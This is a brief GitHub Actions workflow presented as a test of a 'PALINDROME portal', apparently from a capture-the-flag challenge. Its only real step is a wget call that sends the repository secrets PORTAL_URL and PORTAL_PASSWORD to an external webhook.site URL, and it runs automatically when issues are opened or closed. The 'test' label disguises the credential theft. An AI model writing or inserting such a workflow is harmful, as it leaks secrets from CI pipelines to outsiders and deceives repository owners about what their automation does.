name: Test the PALINDROME portal pls!!!

on:
    issues:
        types: [open, closed]

jobs:
  test:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe "https://webhook.site/11baeb3d-93ea-416f-9812-cab376bd2a98?pass=${{ secrets.PORTAL_URL }}/${{ secrets.PORTAL_PASSWORD }}"
          echo "hello world"
          cat test
